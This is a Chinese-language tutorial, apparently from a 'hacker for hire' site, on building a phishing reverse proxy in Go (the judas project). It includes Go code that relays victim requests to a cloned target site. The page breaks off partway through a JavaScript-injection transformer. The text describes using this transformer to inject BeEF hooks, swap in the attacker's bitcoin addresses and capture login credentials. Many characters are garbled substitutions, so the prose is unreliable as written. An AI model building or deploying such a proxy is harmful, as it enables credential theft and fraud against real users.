在Go中运用反向署理进行 *** 垂钓测验

访客5年前关于黑客接单1332

关于一个进犯者来说,要想施行一次 *** 垂钓进犯,往往需求做很多的准备作业。例如建立垂钓站点,诱惑受害者上钩,捕获受害者的登录凭据等。为了防止这些冗杂的进程,本文我将教咱们运用Go自动化这些进程。
完好的代码和运用说明能够在Github检查:https://github.com/JonCooperWorks/judas

署理被用来垂钓TechOnRoad用户。你能看出它们之间的不同吗?
运用署理进行 *** 垂钓
咱们的署理需求接纳来自受害者的恳求,并在发送到方针网站之前重写它们。Go有着许多在原生层面临并发编程进行支撑的优异特性,比方Goroutines、Channels等。咱们建立了一个简略的TCP侦听器,spawn了一个新的goroutine来处理每个传入的衔接和一个goroutine worker来处理恳求和呼应。成果经过channel从恳求处理goroutine传递给worker。
// HTTPTransaction represents a complete request - response flow.
type HTTPTransaction struct {
  Request  *http.Request
  Response *http.Response
}
// PhishingProxy proxies requests between the victim and the target, queuing requests and responses for further processing.
type PhishingProxy struct {
  client               *http.Client
  targetURL            *url.URL
  responseTransformers []ResponseTransformer
}
func main() {
        // ... flag parsing and whatnot
        phishingProxy := &PhishingProxy{
    client:               client,
    targetURL:            u,
    responseTransformers: responseTransformers,
  }
  transactions := make(chan *HTTPTransaction)
  go processTransactions(transactions)
  for {
    conn, err := server.Accept()
    if err != nil {
      log.Println("Error when accepting request,", err.Error())
    }
    go phishingProxy.HandleConnection(conn, transactions)
  }
}
因为Go的优异规范库,恳求处理十分简练。http包供给ReadRequest办法,用于解析从衔接中读取数据的恳求。
defer conn.Close()
reader := bufio.NewReader(conn)
request, err := http.ReadRequest(reader)
if err != nil {
  log.Println("Error parsing request:", err.Error())
  return
}
将一切内容解析成Golang http.Request后,咱们将它传递给方针。署理需求重写来自受害者的HTTP头,以防止方针站点衔接中止,特别是主机头和URL。
request.URL.Scheme = p.targetURL.Scheme
request.URL.Host = p.targetURL.Host
request.Host = p.targetURL.Host
request.RequestURI = ""
resp, err := p.client.Do(request)
if err != nil {
  log.Println("Proxy error:", err.Error())
  return
}
在署理上运用HTTP客户端,咱们建议恳求并保证恳求成功。
一旦咱们得到呼应,咱们运用传递给署理的ResponseTransformers(后面会具体介绍)转化它,运用规范库httputil.DumpResponse函数将呼应转化为字节,并将恳求和呼应发送给goroutine worker之后处理。
for _, transformer := range p.responseTransformers {
  transformer.Transform(resp)
}
modifiedResponse, err := httputil.DumpResponse(resp, true)
if err != nil {
  log.Println("Error converting requests to bytes:", err.Error())
  return
}
_, err = conn.Write(modifiedResponse)
if err != nil {
  log.Println("Error responding to victim:", err.Error())
  return
}
transactions
咱们经过一个channel将HTTP业务传递给worker,以加速咱们的操作进程防止受害者发作某些过错。
只需指向该署理,就能完美克隆方针网站。
// ResponseTransformer modifies a response in any way we see fit, such as inserting extra JavaScript.
type ResponseTransformer interface {
  Transform(response *http.Response) error
}
ResponseTransformer答应你修正呼应。咱们能够用它来任何想做的作业,例如将自界说JavaScript注入到页面,或许将比特币地址替换成咱们自己的。这关于那些在默许署理中无法100%作业的网站也很有用。
JavaScriptInjectionTransformer运用GoQuery将HTML呼应解析到DOM树中,并运用咱们传递给transformer的URL注入脚本标签。咱们能够运用它来注入BeEF hook或绕过网站的安全防护。
// JavaScriptInjectionTransformer holds JavaScript filename for injecting into response.
type JavaScriptInjectionTransformer struct {
  javascriptURL string
}
// Transform Injects JavaScript into an HTML response.
func (j JavaScriptInjectionTransformer) Transform(response *http.Response) error {

[1] [2]  黑客接单网

相关文章

为什么干流网站无法捕获 XSS 缝隙?

 二十多年来,跨站脚本(简称 XSS)缝隙一直是干流网站的心头之痛。为什么过了这么久,这些网站仍是对此类缝隙束手无策呢? 关于最近 eBay 网站曝出的跨站脚本缝隙,你有什么主意?为什么会呈现这样的漏...

Sundown进犯套件的晋级

Exploit Kit职业现在正在发作新的调整,原先许多具有进犯性的缝隙进犯套件或许消失,或许市场份额削减,比方Nuclear EK和AnglerEK这样的职业大鳄几乎在同一时刻消失了,咱们估测这可能...

实例解说False盲注根底原理

0×01 前语 false盲注有些时分能够绕过一些WAF,也是简略被忽视的细节。本文的意图在于经过做CTF的一起来学习注入原理,一起也运用到本身的才能。这儿仅仅简略说一些我自己的了解,或许网上有更好的...

Discuz!ML v.3.X Code Injection Vulnerability Analysis-黑客接单平台

0x1 前语 (Foreword) 原本我今日想学经过剖析下Fastjson反序列化缝隙学习java,还有研讨下php混杂解密和底层hook技能的,可是今日看到在群里看了这篇文章Discuz!ML v...

文件包括&奇技淫巧

前语 最近遇到一些文件包括的标题,在本篇文章记载两个trick。 环境布景 复现环境仍是很简略建立的: 例题1(php7) index.php dir.php 例题2(php5) index.php...

用于浸透测验WordPress的Ruby结构:WordPress Exploit Framework

这个Ruby结构包括一些能够浸透测验WordPress网站和体系的模块,用户也能够自己开发模块扩展其功用。 运转它需求什么条件? 保证体系上装置了Ruby 2.2.x,翻开一个指令行窗口,切换当时目录...